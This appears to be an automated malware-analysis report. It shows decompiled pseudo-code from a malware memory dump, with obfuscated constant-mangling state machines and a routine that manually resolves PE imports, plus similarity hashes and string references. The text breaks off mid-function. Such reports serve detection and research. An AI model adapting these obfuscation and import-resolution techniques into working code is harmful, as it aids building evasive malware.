Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: xU${
API String ID: 0-2711757191
Opcode ID: 4e5288965180bddb6bd4bcd6350a89c32178ab9146271a3700c6caa742d4186d
Instruction ID: 0c42b65bb43c9539d4ee01d932f471a9cfdd1415641a0dcd4a16fa6fcaf1d223
Opcode Fuzzy Hash: 4e5288965180bddb6bd4bcd6350a89c32178ab9146271a3700c6caa742d4186d
Instruction Fuzzy Hash: 175122B1D0120DEBDF48DFA5DA4A8EEBBB1FB08344F208149E515B6260E3B45A45CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 1000C551, Relevance: 2.6, Strings: 2, Instructions: 120
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E1000C551(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t89;
				void* _t99;
				void* _t102;
				signed int _t105;
				signed int _t106;
				signed int _t107;
				void* _t110;
				void* _t126;
				void* _t127;
				signed int* _t130;

				_push(_a8);
				_t126 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100167B8(_t89);
				_v68 = 0x459e5b;
				_t130 =  &(( &_v80)[4]);
				_v68 = _v68 >> 5;
				_v68 = _v68 << 0xf;
				_t127 = 0;
				_v68 = _v68 ^ 0x167329b2;
				_t110 = 0x6540bb0;
				_v72 = 0x7b3f0e;
				_v72 = _v72 + 0x8a0f;
				_v72 = _v72 ^ 0x8bfe7131;
				_v72 = _v72 ^ 0x8b8c2e7f;
				_v64 = 0xfe6c5;
				_v64 = _v64 + 0xffff7132;
				_v64 = _v64 | 0x7e715c03;
				_v64 = _v64 ^ 0x7e7a698b;
				_v80 = 0x805ecd;
				_t105 = 0x73;
				_v80 = _v80 / _t105;
				_v80 = _v80 + 0x471c;
				_t106 = 0x64;
				_v80 = _v80 * 0x34;
				_v80 = _v80 ^ 0x004bdc23;
				_v56 = 0xc19149;
				_v56 = _v56 | 0x0c052790;
				_v56 = _v56 ^ 0x0cca172d;
				_v60 = 0x78953;
				_v60 = _v60 / _t106;
				_v60 = _v60 ^ 0x0007af66;
				_v76 = 0xd4f58;
				_v76 = _v76 | 0x7e7db0d8;
				_v76 = _v76 ^ 0xb8db8674;
				_t107 = 0x25;
				_v76 = _v76 / _t107;
				_v76 = _v76 ^ 0x05561d52;
				_v48 = 0x4547db;
				_v48 = _v48 + 0xde12;
				_v48 = _v48 ^ 0x0042423e;
				_v52 = 0x11916f;
				_v52 = _v52 >> 6;
				_v52 = _v52 ^ 0x000349c5;
				do {
					while(_t110 != 0x139ae71) {
						if(_t110 == 0x5ddc16a) {
							_t102 = E1001F6F2(_v64, _v80, _t126 + 0x10, _v56, _v60,  &_v44);
							_t130 =  &(_t130[4]);
							__eflags = _t102;
							if(__eflags != 0) {
								_t110 = 0x139ae71;
								continue;
							}
						} else {
							if(_t110 == 0x6540bb0) {
								_t110 = 0x9ce0ea8;
								continue;
							} else {
								if(_t110 != 0x9ce0ea8) {
									goto L10;
								} else {
									E1000A488(_a8,  &_v44, _v68, _v72);
									_t130 =  &(_t130[2]);
									_t110 = 0x5ddc16a;
									continue;
								}
							}
						}
						goto L11;
					}
					_t99 = E10003FB0(_t126 + 0x28, _v76, __eflags, _v48, _v52,  &_v44);
					_t130 =  &(_t130[3]);
					__eflags = _t99;
					_t127 =  !=  ? 1 : _t127;
					_t110 = 0x2fa8b6;
					L10:
					__eflags = _t110 - 0x2fa8b6;
				} while (__eflags != 0);
				L11:
				return _t127;
			}

0x1000c558
0x1000c55c
0x1000c55e
0x1000c562
0x1000c563
0x1000c564
0x1000c569
0x1000c571
0x1000c574
0x1000c57b
0x1000c580
0x1000c582
0x1000c58a
0x1000c58f
0x1000c59c
0x1000c5a4
0x1000c5ac
0x1000c5b4
0x1000c5bc
0x1000c5c4
0x1000c5cc
0x1000c5d4
0x1000c5e2
0x1000c5e7
0x1000c5ed
0x1000c5fa
0x1000c5fd
0x1000c601
0x1000c609
0x1000c611
0x1000c619
0x1000c621
0x1000c631
0x1000c635
0x1000c63d
0x1000c645
0x1000c64d
0x1000c659
0x1000c661
0x1000c665
0x1000c66d
0x1000c675
0x1000c67d
0x1000c685
0x1000c68d
0x1000c692
0x1000c69a
0x1000c69a
0x1000c6a4
0x1000c6ee
0x1000c6f3
0x1000c6f6
0x1000c6f8
0x1000c6fa
0x00000000
0x1000c6fa
0x1000c6a6
0x1000c6ac
0x1000c6d1
0x00000000
0x1000c6ae
0x1000c6b0
0x00000000
0x1000c6b2
0x1000c6c2
0x1000c6c7
0x1000c6ca
0x00000000
0x1000c6ca
0x1000c6b0
0x1000c6ac
0x00000000
0x1000c6a4
0x1000c712
0x1000c719
0x1000c71d
0x1000c71f
0x1000c722
0x1000c727
0x1000c727
0x1000c727
0x1000c734
0x1000c73c

Strings

>BB, xrefs: 1000C67D
XO, xrefs: 1000C63D

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: >BB$XO
API String ID: 0-1094502697
Opcode ID: 004520db82d865331e5af70c853aa93c9a6d552bb43aa764a422d9448cafbc55
Instruction ID: a06fb2288f39156c72ac46e88645783074f21e0ecd518b7c9f3571f0e4bb0b13
Opcode Fuzzy Hash: 004520db82d865331e5af70c853aa93c9a6d552bb43aa764a422d9448cafbc55
Instruction Fuzzy Hash: 5E4178715083469BD744CF20C88982FBBE1FBD8398F50892DF59656260C775CA49CF87

Uniqueness

Uniqueness Score: -1.00%

Function 1001000D, Relevance: 2.6, Strings: 2, Instructions: 114
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E1001000D(intOrPtr* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t72;
				intOrPtr _t83;
				signed int _t84;
				intOrPtr* _t87;
				void* _t89;
				intOrPtr* _t100;
				void* _t101;
				signed int _t103;
				signed int* _t106;

				_push(_a12);
				_t87 = __edx;
				_t100 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100167B8(_t72);
				_v28 = 0x2f786e;
				_t106 =  &(( &_v32)[5]);
				_v28 = _v28 + 0xffff83f9;
				_t101 = 0;
				_t89 = 0xa7022d1;
				_t103 = 0x36;
				_v28 = _v28 / _t103;
				_v28 = _v28 | 0x307e080f;
				_v28 = _v28 ^ 0x30797a9a;
				_v20 = 0x4da859;
				_v20 = _v20 >> 7;
				_v20 = _v20 ^ 0x3e6cddc9;
				_v20 = _v20 ^ 0x3e6694f2;
				_v32 = 0xf38b88;
				_v32 = _v32 + 0xffffe7d1;
				_v32 = _v32 << 7;
				_v32 = _v32 ^ 0xa6ab51a0;
				_v32 = _v32 ^ 0xdf128c1c;
				_v24 = 0xb17f4e;
				_v24 = _v24 | 0x5d1d7ca0;
				_v24 = _v24 + 0xff8a;
				_v24 = _v24 ^ 0x5dbb16a9;
				_v4 = 0x314ae2;
				_v4 = _v4 + 0xffff6ea8;
				_v4 = _v4 ^ 0x0038a707;
				_v12 = 0xf2763;
				_v12 = _v12 >> 6;
				_v12 = _v12 * 0x14;
				_v12 = _v12 ^ 0x000ce4fd;
				_v16 = 0x1a50f1;
				_v16 = _v16 << 8;
				_v16 = _v16 + 0xffffbcdf;
				_v16 = _v16 ^ 0x1a5bd47d;
				_v8 = 0x86f22c;
				_v8 = _v8 | 0x3a16eea0;
				_v8 = _v8 ^ 0x3a9580e0;
				while(_t89 != 0x552b573) {
					if(_t89 == 0x8f89ab7) {
						E10020588();
						_t89 = 0x552b573;
						continue;
					} else {
						if(_t89 == 0xa7022d1) {
							_push(_t89);
							_t83 = E100134E7(_t89, 0x60);
							_t106 =  &(_t106[3]);
							 *0x10025218 = _t83;
							_t89 = 0xb47eecf;
							continue;
						} else {
							if(_t89 == 0xb47eecf) {
								_t84 = E1000E16F(_t87);
								asm("sbb ecx, ecx");
								_t89 = ( ~_t84 & 0x0795f7e9) + 0x552b573;
								continue;
							} else {
								if(_t89 != 0xce8ad5c) {
									L12:
									if(_t89 != 0x6334db5) {
										continue;
									} else {
									}
								} else {
									if(E10010ED9(_t100) != 0) {
										_t101 = 1;
									} else {
										_t89 = 0x8f89ab7;
										continue;
									}
								}
							}
						}
					}
					return _t101;
				}
				E100088FC(_v4, _v12, _v16, _v8,  *0x10025218);
				_t106 =  &(_t106[3]);
				_t89 = 0x6334db5;
				goto L12;
			}

0x10010014
0x10010018
0x1001001a
0x1001001c
0x10010020
0x10010024
0x10010025
0x10010026
0x1001002b
0x10010033
0x10010036
0x10010044
0x10010046
0x1001004d
0x10010055
0x10010059
0x10010061
0x10010069
0x10010071
0x10010076
0x1001007e
0x10010086
0x1001008e
0x10010096
0x1001009b
0x100100a3
0x100100ab
0x100100b3
0x100100bb
0x100100c3
0x100100cb
0x100100d3
0x100100db
0x100100e3
0x100100eb
0x100100f5
0x100100f9
0x10010101
0x10010109
0x1001010e
0x10010116
0x1001011e
0x10010126
0x1001012e
0x10010136
0x10010144
0x100101ba
0x100101bf
0x00000000
0x10010146
0x1001014c
0x1001019f
0x100101a3
0x100101a8
0x100101ab
0x100101b0
0x00000000
0x1001014e
0x10010154
0x1001017a
0x10010183
0x1001018b
0x00000000
0x10010156
0x1001015c
0x100101e9
0x100101ef
0x00000000
0x00000000
0x100101f5
0x10010162
0x1001016b
0x100101f9
0x10010171
0x10010171
0x00000000
0x10010171
0x1001016b
0x1001015c
0x10010154
0x1001014c
0x10010203
0x10010203
0x100101dc
0x100101e1
0x100101e4
0x00000000

Strings

nx/, xrefs: 1001002B
J1, xrefs: 100100CB

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: nx/$J1
API String ID: 0-3515748060
Opcode ID: 74533b68622b224681c2ea99d092440a261ff9c0a8756dc51dfc823f3319435b
Instruction ID: 853ee5b6805d9403abd61d29040ac91cc0345e21391a04b01675b3a68c8c465a
Opcode Fuzzy Hash: 74533b68622b224681c2ea99d092440a261ff9c0a8756dc51dfc823f3319435b
Instruction Fuzzy Hash: ED41AD716083429FC358CF25C84542FBBE1FBC8358F504A1DF5866A261D7B8DA89CB87

Uniqueness

Uniqueness Score: -1.00%

Function 1000A4AA, Relevance: 2.6, Strings: 2, Instructions: 114
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E1000A4AA(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				void* _t119;
				void* _t123;
				signed int _t125;
				signed int _t126;
				signed int _t127;
				void* _t141;

				_push(_a20);
				_t123 = __edx;
				_push(_a16);
				_v52 = 0x104;
				_push(_a12);
				_push(0x104);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100167B8(0x104);
				_v8 = 0xced28d;
				_t141 = 0;
				_t125 = 0xc;
				_v8 = _v8 / _t125;
				_v8 = _v8 ^ 0x0ef26493;
				_v8 = _v8 << 5;
				_v8 = _v8 ^ 0xdc6b04a0;
				_v40 = 0x933c30;
				_v40 = _v40 ^ 0x915bafb8;
				_v40 = _v40 ^ 0x91c6f618;
				_v20 = 0xd5da96;
				_t126 = 0x3e;
				_v20 = _v20 / _t126;
				_v20 = _v20 + 0xea;
				_v20 = _v20 ^ 0x000f2bea;
				_v36 = 0x47eb32;
				_v36 = _v36 + 0xfffff761;
				_v36 = _v36 ^ 0x004aea7e;
				_v16 = 0x7fc736;
				_v16 = _v16 ^ 0x1c98a52d;
				_v16 = _v16 + 0xfffffc7e;
				_v16 = _v16 << 0xa;
				_v16 = _v16 ^ 0x9d718fd9;
				_v24 = 0xe25f74;
				_v24 = _v24 | 0x0e09b433;
				_t127 = 0x1f;
				_v24 = _v24 * 0x26;
				_v24 = _v24 ^ 0x3709a463;
				_v12 = 0xc47a67;
				_v12 = _v12 * 0x5e;
				_v12 = _v12 << 1;
				_v12 = _v12 ^ 0xd8017d31;
				_v12 = _v12 ^ 0x4845887a;
				_v48 = 0x6c8972;
				_v48 = _v48 / _t127;
				_v48 = _v48 ^ 0x0001ec77;
				_v44 = 0x5e8a29;
				_v44 = _v44 >> 7;
				_v44 = _v44 ^ 0x000a6210;
				_v32 = 0xa66488;
				_v32 = _v32 >> 2;
				_v32 = _v32 >> 0xf;
				_v32 = _v32 ^ 0x00077638;
				_v28 = 0x6b24f8;
				_v28 = _v28 << 0xd;
				_v28 = _v28 >> 8;
				_v28 = _v28 ^ 0x00655790;
				_t119 = E1000C73D(_a12, _t127, _t127, _v8);
				_t140 = _t119;
				if(_t119 != 0) {
					_t141 = E100104F8( &_v52, _v16, _v24, _t123, _v12, _t127, _t140);
					E100074B2(_v48, _v44, _v32, _t140, _v28);
				}
				return _t141;
			}

0x1000a4b3
0x1000a4bb
0x1000a4bd
0x1000a4c0
0x1000a4c3
0x1000a4c6
0x1000a4c7
0x1000a4ca
0x1000a4cb
0x1000a4cc
0x1000a4d1
0x1000a4dd
0x1000a4e1
0x1000a4e6
0x1000a4eb
0x1000a4f2
0x1000a4f6
0x1000a4fd
0x1000a504
0x1000a50b
0x1000a512
0x1000a51c
0x1000a521
0x1000a526
0x1000a52d
0x1000a534
0x1000a53b
0x1000a542
0x1000a549
0x1000a550
0x1000a557
0x1000a55e
0x1000a562
0x1000a569
0x1000a570
0x1000a57b
0x1000a57c
0x1000a57f
0x1000a586
0x1000a591
0x1000a594
0x1000a597
0x1000a59e
0x1000a5a5
0x1000a5b1
0x1000a5b4
0x1000a5bb
0x1000a5c2
0x1000a5c6
0x1000a5cd
0x1000a5d4
0x1000a5d8
0x1000a5dc
0x1000a5e3
0x1000a5ea
0x1000a5ee
0x1000a5f2
0x1000a60d
0x1000a612
0x1000a619
0x1000a632
0x1000a63e
0x1000a643
0x1000a64e

Strings

t_, xrefs: 1000A569
~J, xrefs: 1000A542

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: t_$~J
API String ID: 0-2604359871
Opcode ID: 5b65b8beafb4ee120cb527de29fe1427875c11a360059a3f862aafdaf6745f03
Instruction ID: 81ea40fe6b20c172210d47d77b3663b906d7ab8c07dd143ed6939f5007c70bac
Opcode Fuzzy Hash: 5b65b8beafb4ee120cb527de29fe1427875c11a360059a3f862aafdaf6745f03
Instruction Fuzzy Hash: CA5113B1D0020DAFDF14CFE5C94A8EEBBB5FB48314F208158E921B6260D7B95A54DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 10005651, Relevance: 2.6, Strings: 2, Instructions: 110
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E10005651(void* __edx, signed int _a4, intOrPtr _a8) {
				signed int _v4;
				intOrPtr _v8;
				signed int _v12;
				signed short _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* __ecx;
				void* _t78;
				void* _t84;
				signed short _t91;
				signed short _t94;
				signed int _t95;
				signed int _t97;
				signed int _t98;
				signed short _t100;
				intOrPtr _t107;
				signed short* _t111;
				signed short _t112;
				signed short _t114;
				signed int* _t116;

				_t95 = _a4;
				_push(_a8);
				_push(_t95);
				_push(__edx);
				E100167B8(_t78);
				_v4 = _v4 & 0x00000000;
				_t116 =  &(( &_v32)[4]);
				_v8 = 0x850b99;
				_v16 = 0xc27a5d;
				_v16 = _v16 ^ 0xd09e0d9b;
				_v16 = _v16 ^ 0xd05c77c7;
				_a4 = 0x959932;
				_t97 = 0x31;
				_a4 = _a4 / _t97;
				_a4 = _a4 >> 0xc;
				_a4 = _a4 << 0xb;
				_a4 = _a4 ^ 0x0000c0dd;
				_v24 = 0xe2e347;
				_v24 = _v24 ^ 0x42937456;
				_v24 = _v24 * 0x63;
				_v24 = _v24 ^ 0xb1eeeba5;
				_v28 = 0x2a692d;
				_v28 = _v28 >> 0xa;
				_v28 = _v28 >> 0xf;
				_v28 = _v28 ^ 0x0008aeda;
				_v12 = 0x438daa;
				_v12 = _v12 ^ 0x288a83c7;
				_v12 = _v12 ^ 0x28cb99d7;
				_v32 = 0x48b9a2;
				_v32 = _v32 + 0xa31b;
				_v32 = _v32 >> 6;
				_v32 = _v32 << 0xc;
				_v32 = _v32 ^ 0x125d41dd;
				_v20 = 0xfad716;
				_v20 = _v20 | 0x61bf997e;
				_v20 = _v20 << 6;
				_v20 = _v20 ^ 0x7ff6414f;
				_t98 = _v16;
				_t84 =  *((intOrPtr*)(_t95 + 0x3c)) + _t95;
				_t107 =  *((intOrPtr*)(_t84 + 0x78 + _t98 * 8));
				if(_t107 == 0 ||  *((intOrPtr*)(_t84 + 0x7c + _t98 * 8)) == 0) {
					L13:
					return 1;
				} else {
					_t112 = _t107 + _t95;
					while(1) {
						_t87 =  *((intOrPtr*)(_t112 + 0xc));
						if( *((intOrPtr*)(_t112 + 0xc)) == 0) {
							goto L13;
						}
						_t100 = E10010E34(_a4, _v24, _v28, _v12, _t87 + _t95);
						_t116 =  &(_t116[3]);
						_v16 = _t100;
						__eflags = _t100;
						if(_t100 == 0) {
							L15:
							return 0;
						}
						_t111 =  *_t112 + _t95;
						_t114 =  *((intOrPtr*)(_t112 + 0x10)) + _t95;
						while(1) {
							_t91 =  *_t111;
							__eflags = _t91;
							if(__eflags == 0) {
								break;
							}
							if(__eflags >= 0) {
								_t93 = _t91 + 2 + _t95;
								__eflags = _t91 + 2 + _t95;
							} else {
								_t93 = _t91 & 0x0000ffff;
							}
							_t94 = E100120C0(_v32, _t100, _t93, _v20);
							__eflags = _t94;
							if(_t94 == 0) {
								goto L15;
							} else {
								_t100 = _v16;
								_t111 =  &(_t111[2]);
								 *_t114 = _t94;
								_t114 =  &_a4;
								__eflags = _t114;
								continue;
							}
						}
						_t112 = _t112 + 0x14;
						__eflags = _t112;
					}
					goto L13;
				}
			}

0x10005655
0x1000565c
0x10005660
0x10005661
0x10005663
0x10005668
0x1000566d
0x10005670
0x1000567a
0x10005682
0x1000568a
0x10005692
0x100056a0
0x100056a3
0x100056a7
0x100056ac
0x100056b1
0x100056b9
0x100056c1
0x100056ce
0x100056d2
0x100056da
0x100056e2
0x100056e7
0x100056ec
0x100056f4
0x100056fc
0x10005704
0x1000570c
0x10005714
0x1000571c
0x10005721
0x10005726
0x1000572e
0x10005736
0x1000573e
0x10005743
0x1000574e
0x10005752
0x10005754
0x1000575a
0x100057d7
0x00000000
0x10005763
0x10005763
0x100057d0
0x100057d0
0x100057d5
0x00000000
0x00000000
0x10005780
0x10005782
0x10005785
0x10005789
0x1000578b
0x100057e2
0x00000000
0x100057e2
0x10005792
0x10005794
0x100057c7
0x100057c7
0x100057c9
0x100057cb
0x00000000
0x00000000
0x10005798
0x100057a2
0x100057a2
0x1000579a
0x1000579a
0x1000579a
0x100057af
0x100057b6
0x100057b8
0x00000000
0x100057ba
0x100057ba
0x100057be
0x100057c1
0x100057c4
0x100057c4
0x00000000
0x100057c4
0x100057b8
0x100057cd
0x100057cd
0x100057cd
0x00000000
0x100057d0

Strings

G, xrefs: 100056B9
-i*, xrefs: 100056DA

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: -i*$G
API String ID: 0-245119470
Opcode ID: 0529e3edccd44fe861e502a5b3f54703cc29cc14c3fbfdebe4139a59bff011a7
Instruction ID: 1b2f8946ad90d2689632a8e072d7cfcf5f2c3cceb023af8d5bbf31e2007e2d67
Opcode Fuzzy Hash: 0529e3edccd44fe861e502a5b3f54703cc29cc14c3fbfdebe4139a59bff011a7
Instruction Fuzzy Hash: 6A4165B12093428FE348CF25D88551BBBE0FFC8798F10491CF89986211D775DA48DB92

Uniqueness

Uniqueness Score: -1.00%

Function 100231BA, Relevance: 2.6, Strings: 2, Instructions: 94
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E100231BA() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _t95;
				void* _t97;
				signed int _t105;
				signed int _t106;
				void* _t108;

				_v40 = _v40 & 0x00000000;
				_v48 = 0xb39f64;
				_v44 = 0xe4788e;
				_v24 = 0x7b78a2;
				_v24 = _v24 | 0xffd287fa;
				_v24 = _v24 ^ 0xe3341afd;
				_v24 = _v24 ^ 0x1ccfb836;
				_v36 = 0x8fc305;
				_v36 = _v36 | 0xa757d271;
				_v36 = _v36 ^ 0xa7d3d616;
				_v20 = 0x93009d;
				_v20 = _v20 << 3;
				_v20 = _v20 * 0x6d;
				_v20 = _v20 ^ 0xf4b69e8c;
				_t97 = 0x4d605dd;
				_v8 = 0xf6de36;
				_v8 = _v8 ^ 0x58d185e3;
				_v8 = _v8 | 0x70723a4a;
				_v8 = _v8 ^ 0x5c9328e3;
				_v8 = _v8 ^ 0x24e21468;
				_v16 = 0x482895;
				_v16 = _v16 << 4;
				_v16 = _v16 >> 8;
				_v16 = _v16 >> 0xd;
				_v16 = _v16 ^ 0x00031ab9;
				_v32 = 0xd6a1b6;
				_v32 = _v32 + 0xad77;
				_v32 = _v32 << 1;
				_v32 = _v32 ^ 0x01a03753;
				_v12 = 0x2eeebe;
				_t105 = 0x1a;
				_v12 = _v12 / _t105;
				_v12 = _v12 | 0x21c406fb;
				_v12 = _v12 << 0xd;
				_v12 = _v12 ^ 0xb9d062b3;
				_v28 = 0x2ed0d6;
				_v28 = _v28 >> 6;
				_t106 = 0x5f;
				_v28 = _v28 / _t106;
				_v28 = _v28 ^ 0x000d0d2b;
				do {
					while(_t97 != 0x2a7ee91) {
						if(_t97 == 0x4d605dd) {
							_push(_t97);
							_t95 = E100134E7(_t97, 0x134);
							_t108 = _t108 + 0xc;
							 *0x10025aa0 = _t95;
							_t97 = 0x2a7ee91;
							continue;
						}
						goto L5;
					}
					E100108D9(_v16, _v32,  *0x10025aa0 + 0x1c, _v12, _v28);
					_t108 = _t108 + 0xc;
					_t97 = 0xe4e4248;
					L5:
				} while (_t97 != 0xe4e4248);
				return 1;
			}

0x100231c0
0x100231c6
0x100231cd
0x100231d4
0x100231db
0x100231e2
0x100231e9
0x100231f0
0x100231f7
0x100231fe
0x10023205
0x1002320c
0x10023219
0x10023221
0x10023228
0x1002322a
0x10023236
0x1002323d
0x10023244
0x1002324b
0x10023252
0x10023259
0x1002325d
0x10023261
0x10023265
0x1002326c
0x10023273
0x1002327a
0x1002327d
0x10023284
0x1002328e
0x10023293
0x10023298
0x1002329f
0x100232a3
0x100232aa
0x100232b1
0x100232b8
0x100232c0
0x100232c3
0x100232ca
0x100232ca
0x100232d0
0x100232de
0x100232e5
0x100232ea
0x100232ed
0x100232f2
0x00000000
0x100232f2
0x00000000
0x100232d0
0x1002330b
0x10023310
0x10023313
0x10023315
0x10023315
0x10023322

Strings

J:rp, xrefs: 1002323D
+, xrefs: 100232C3

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: +$J:rp
API String ID: 0-3094341860
Opcode ID: ba392b3980339f9b7bf3132d2e0f2f540ee04dd6fc49ebae2929645ded50bda1
Instruction ID: 007e27ba7a15e20d98ddc75030eb1cc0e763ab5a1017b71673bb48e726bb792d
Opcode Fuzzy Hash: ba392b3980339f9b7bf3132d2e0f2f540ee04dd6fc49ebae2929645ded50bda1
Instruction Fuzzy Hash: A7410171E00619EBDF19CFE5C98A5EEBBB1FB48318F608169D026B7210D3B44A49CF95

Uniqueness

Uniqueness Score: -1.00%

Function 10007931, Relevance: 1.5, Strings: 1, Instructions: 238
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E10007931() {
				char _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				intOrPtr _t230;
				signed int _t233;
				void* _t234;
				signed int _t240;
				void* _t243;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t276;
				void* _t278;
				signed int* _t280;
				void* _t283;

				_t280 =  &_v608;
				_v572 = 0x82ca03;
				_v572 = _v572 | 0xf7ffffef;
				_t243 = 0xf56c88;
				_v572 = _v572 ^ 0xf7fffff3;
				_v528 = 0xa69558;
				_v528 = _v528 ^ 0x1df2711f;
				_v528 = _v528 ^ 0x1d54e46e;
				_v580 = 0xbb77ee;
				_t270 = 0x30;
				_v580 = _v580 / _t270;
				_v580 = _v580 ^ 0x74115850;
				_t278 = 0;
				_v580 = _v580 + 0xffffa62c;
				_v580 = _v580 ^ 0x741d658f;
				_v564 = 0x673272;
				_v564 = _v564 + 0x6c07;
				_t271 = 0x7a;
				_v564 = _v564 / _t271;
				_v564 = _v564 ^ 0x000ba1a1;
				_v604 = 0x9bfe63;
				_v604 = _v604 + 0xffffe22d;
				_v604 = _v604 | 0x1873d8ec;
				_v604 = _v604 + 0xffff42df;
				_v604 = _v604 ^ 0x18f45889;
				_v608 = 0x1936af;
				_t272 = 0x39;
				_v608 = _v608 / _t272;
				_t273 = 0x7d;
				_v608 = _v608 * 0x6e;
				_v608 = _v608 << 0xe;
				_v608 = _v608 ^ 0x2a017e02;
				_v592 = 0x1b85cd;
				_v592 = _v592 >> 0xa;
				_v592 = _v592 + 0xffffcb64;
				_v592 = _v592 / _t273;
				_v592 = _v592 ^ 0x020ab5e1;
				_v552 = 0xf61a08;
				_v552 = _v552 + 0x1162;
				_v552 = _v552 ^ 0x00fd8b53;
				_v588 = 0x7f4197;
				_v588 = _v588 + 0xfffff16d;
				_v588 = _v588 >> 8;
				_v588 = _v588 | 0x6d06e57f;
				_v588 = _v588 ^ 0x6d08c36e;
				_v596 = 0x44c87f;
				_v596 = _v596 ^ 0x5981c67e;
				_v596 = _v596 >> 0xf;
				_v596 = _v596 >> 7;
				_v596 = _v596 ^ 0x000845e9;
				_v532 = 0x1da63;
				_v532 = _v532 + 0xffff7a34;
				_v532 = _v532 ^ 0x0007f4bc;
				_v540 = 0xe2881e;
				_v540 = _v540 >> 7;
				_v540 = _v540 ^ 0x0005d883;
				_v560 = 0xced287;
				_v560 = _v560 + 0xffff4326;
				_v560 = _v560 | 0x861585ca;
				_v560 = _v560 ^ 0x86d3820e;
				_v568 = 0x7a6ad3;
				_v568 = _v568 >> 3;
				_t274 = 0x55;
				_v568 = _v568 / _t274;
				_v568 = _v568 ^ 0x000b2edc;
				_v584 = 0x61c48f;
				_v584 = _v584 >> 4;
				_v584 = _v584 >> 7;
				_v584 = _v584 | 0x2c035a3e;
				_v584 = _v584 ^ 0x2c0563e6;
				_v600 = 0x9f9cec;
				_v600 = _v600 >> 9;
				_t275 = 0x6b;
				_v600 = _v600 * 0xa;
				_v600 = _v600 << 4;
				_v600 = _v600 ^ 0x003f53ad;
				_v576 = 0xf68113;
				_v576 = _v576 << 0xd;
				_v576 = _v576 + 0xffff7ec7;
				_v576 = _v576 / _t275;
				_v576 = _v576 ^ 0x01f6b9d7;
				_v548 = 0x23f47a;
				_v548 = _v548 + 0xd63e;
				_v548 = _v548 ^ 0x0020c41f;
				_v556 = 0x8b8838;
				_v556 = _v556 ^ 0x5706225c;
				_v556 = _v556 + 0xffffa43e;
				_v556 = _v556 ^ 0x57851e91;
				_v536 = 0xacc94d;
				_v536 = _v536 >> 0xa;
				_v536 = _v536 ^ 0x00025a2d;
				_v544 = 0xd7cdab;
				_t276 = 0x38;
				_t277 = _v524;
				_v544 = _v544 / _t276;
				_v544 = _v544 ^ 0x000c1e78;
				goto L1;
				do {
					while(1) {
						L1:
						_t283 = _t243 - 0x4d561e3;
						if(_t283 > 0) {
							break;
						}
						if(_t283 == 0) {
							E1000FBF7();
							_t243 = 0x3cdf9de;
							continue;
						}
						if(_t243 == 0xf56c88) {
							_push(_t243);
							_t230 = E100134E7(_t243, 0x440);
							_t280 =  &(_t280[3]);
							 *0x10025208 = _t230;
							_t243 = 0xcb7b8c8;
							continue;
						}
						if(_t243 == 0x108803d) {
							_push(_t243);
							_t233 = E1000441F(_v568, _v524, _v584, _v600,  *0x10025208 + 0x230, _t243, _v576);
							_t280 =  &(_t280[7]);
							_t243 = 0x4d561e3;
							__eflags = _t233;
							_t234 = 1;
							_t278 =  ==  ? _t234 : _t278;
							continue;
						}
						if(_t243 == 0x163a44b) {
							E10010839(_v532, _t277, _v540, _v560);
							_t243 = 0x108803d;
							continue;
						}
						_t287 = _t243 - 0x3cdf9de;
						if(_t243 != 0x3cdf9de) {
							goto L21;
						}
						E1001E780(_v548, _t287, _v556,  &_v520);
						 *((intOrPtr*)( *0x10025208 + 0x14)) = E10020488(_v536, _v544);
						L8:
						return _t278;
					}
					__eflags = _t243 - 0x759c44b;
